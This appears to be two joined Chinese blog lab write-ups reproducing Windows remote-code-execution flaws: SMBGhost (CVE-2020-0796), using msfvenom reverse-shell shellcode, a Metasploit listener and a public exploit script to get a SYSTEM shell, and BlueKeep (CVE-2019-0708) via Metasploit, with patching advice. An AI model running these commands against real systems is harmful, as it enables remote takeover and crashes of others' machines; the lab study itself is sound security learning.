友情提示:
初入安全,小白一個(gè),本文重在學(xué)習(xí)與經(jīng)驗(yàn)分享!!!
背景
微軟服務(wù)器消息塊3.1.1(SMBv3)協(xié)議處理某些請(qǐng)求的方式中存在一個(gè)遠(yuǎn)程執(zhí)行代碼漏洞,攻擊者可以通過(guò)此漏洞獲得在目標(biāo)服務(wù)器或客戶端上執(zhí)行代碼的能力,如:執(zhí)行DOS命令。
1. 實(shí)驗(yàn)環(huán)境
本次實(shí)驗(yàn)通過(guò)反彈shell,可直接獲取Windows 10系統(tǒng)的System權(quán)限。
Kali Linux IP:192.168.0.11/24,或者安裝有MSF漏洞利用框架工具的計(jì)算機(jī)
靶機(jī) IP:192.168.0.105/24,關(guān)閉windows自帶防火墻和網(wǎng)絡(luò)防火墻,確保網(wǎng)絡(luò)可ping通
靶機(jī)系統(tǒng)版本:Windows 10 v1909
POC:http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip(奇安信POC需要python 3以上的版本,本次實(shí)驗(yàn)python版本為3.8)
EXP:https://github.com/chompie1337/SMBGhost_RCE_PoC
注:github上有各種POC和EXP,如:藍(lán)屏、提權(quán)、代碼執(zhí)行、拿shell等,搜索并下載想要復(fù)現(xiàn)的POC或EXP即可。
2. 漏洞編號(hào)
CVE-2020-0796
3. 漏洞影響范圍
Windows 10 Version 1903 for 32-bit Systems
Windows 10 Version 1903 for x64-based Systems
Windows 10 Version 1903 for ARM64-based Systems
Windows Server, Version 1903 (Server Core installation)
Windows 10 Version 1909 for 32-bit Systems
Windows 10 Version 1909 for x64-based Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows Server, Version 1909 (Server Core installation)
4. 漏洞復(fù)現(xiàn)過(guò)程
4.1 漏洞探測(cè)
利用奇安信POC工具,判斷靶機(jī)是否存在CVE-2020-0796漏洞。
4.2 漏洞利用
(1)使用kali自帶的Metasploit(MSF)工具生成shellcode代碼
/* 參數(shù)含義
arch指定系統(tǒng)為64系統(tǒng)
platform指定系統(tǒng)平臺(tái)為windows平臺(tái)
lhost指定攻擊IP地址為kali系統(tǒng)的IP
lport指定反彈shell時(shí)本地連接所用的端口,隨意指定一個(gè)不在用的端口就行。
*/
# shellcode生成命令
msfvenom -p windows/x64/meterpreter/reverse_tcp --arch=x64 --platform=windows lhost=192.168.0.11 lport=4444 -f py -o win10_shellcode.txt
(2)將生成的shellcode內(nèi)容復(fù)制并替換exploit.py文件中的USER_PAYLOAD內(nèi)容并保存。
(3)將修改好的EXP文件夾上傳到kali中中任意目錄下。
(4)運(yùn)行kali自帶的MSF工具,并執(zhí)行反彈shell的監(jiān)聽(tīng)
# 啟用MSF
msfconsole
# 設(shè)置監(jiān)聽(tīng)參數(shù)
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.0.11
msf6 exploit(multi/handler) > set lport 4444
# 查看反彈shell的監(jiān)聽(tīng)配置是否正確
msf6 exploit(multi/handler) > show options
# 檢查配置無(wú)誤,運(yùn)行監(jiān)聽(tīng)
msf6 exploit(multi/handler) > run
# 運(yùn)行監(jiān)聽(tīng)后,再執(zhí)行EXP中的exploit.py文件。如果執(zhí)行過(guò)程提示無(wú)權(quán)限,可執(zhí)行chmod 777 exploit.py解決。
python3 exploit.py -ip 192.168.0.105
(5)查看kali的監(jiān)聽(tīng)狀態(tài),靶機(jī)如果有漏洞,會(huì)獲得靶機(jī)反彈的shell,復(fù)現(xiàn)成功。
(6)在meterpreter命令行下,敲"shell"命令,可以進(jìn)入靶機(jī)的DOS環(huán)境。
5. 安全建議
及時(shí)更新Windows 10系統(tǒng)安全補(bǔ)丁。
軍訓(xùn)終于結(jié)束了,我從一個(gè)比較白的小伙紙變成了一個(gè)挖煤工人
拖更了那么多天,和大家陪個(gè)不是,這不,剛下火車(chē),到家就更新。msf前幾天更新了cve_2019_0708_bluekeep_rce 的exp,實(shí)驗(yàn)了一下,百試百靈。哈哈哈(滑稽)
Windows再次被曝出一個(gè)破壞力巨大的高危遠(yuǎn)程漏洞CVE-2019-0708。攻擊者一旦成功利用該漏洞,便可以在目標(biāo)系統(tǒng)上執(zhí)行任意代碼,包括獲取敏感信息、執(zhí)行遠(yuǎn)程代碼、發(fā)起拒絕服務(wù)攻擊等等攻擊行為。而更加嚴(yán)重的是,這個(gè)漏洞的觸發(fā)無(wú)需用戶交互,攻擊者可以用該漏洞制作堪比2017年席卷全球的WannaCry類蠕蟲(chóng)病毒,從而進(jìn)行大規(guī)模傳播和破壞。
只要你開(kāi)了遠(yuǎn)程桌面就有被攻擊的可能,win10笑出了聲。
首先你得有msf的框架,可以自行去官網(wǎng)下載,或者kali內(nèi)內(nèi)置的也可以,但如果不是v5.0.50-dev 的就需要升級(jí)一下軟件了。
輸入
search cve-2019
exp
我選中的這個(gè)就是exp了。再次輸入命令
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
輸入show options ,查看設(shè)置頁(yè)面
設(shè)置好ip地址,和payload。
關(guān)鍵的地方來(lái)了,這里需要注意的是,設(shè)置目標(biāo)種類
輸入show target
根據(jù)需要選擇,如果選錯(cuò)了,那么被攻擊主機(jī)就會(huì)藍(lán)屏。有點(diǎn)坑
準(zhǔn)備就緒,就可以開(kāi)始攻擊了
雖然攻擊沒(méi)成功,但是也成功的讓目標(biāo)主機(jī)藍(lán)屏,如果有針對(duì)的版本就可以建立shell連接,可能是我之前攻擊過(guò)的原因,現(xiàn)在導(dǎo)致一直無(wú)法建立連接。
1.安裝微軟發(fā)布的安全更新補(bǔ)丁
Microsoft官方已經(jīng)在 2019年5月14日修復(fù)了該漏洞,用戶可以通過(guò)安裝微軟的安全更新來(lái)給系統(tǒng)打上安全補(bǔ)丁,下載地址為:https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708
以及為已不受微軟更新支持的系統(tǒng)(Windows Server 2003和Windows XP)提供的安全更新,下載地址:https://support.microsoft.com/zh-cn/help/4500705/customer-guidance-for-cve-2019-0708
2. 在無(wú)法及時(shí)安裝微軟安全更新的情況下作為臨時(shí)性解決方案
若用戶不需要用到遠(yuǎn)程桌面服務(wù),建議禁用該服務(wù)。
如果由于某些原因安裝補(bǔ)丁不成功,或者因?yàn)槠渌虿荒馨惭b補(bǔ)丁,建議采取緩解措施,win7或win server 2008 r2里選擇“我的電腦”→“屬性”→“遠(yuǎn)程設(shè)置”→“遠(yuǎn)程”,啟用網(wǎng)路級(jí)認(rèn)證(NLA)
本文作者:Whitezero,轉(zhuǎn)載請(qǐng)注明原鏈接。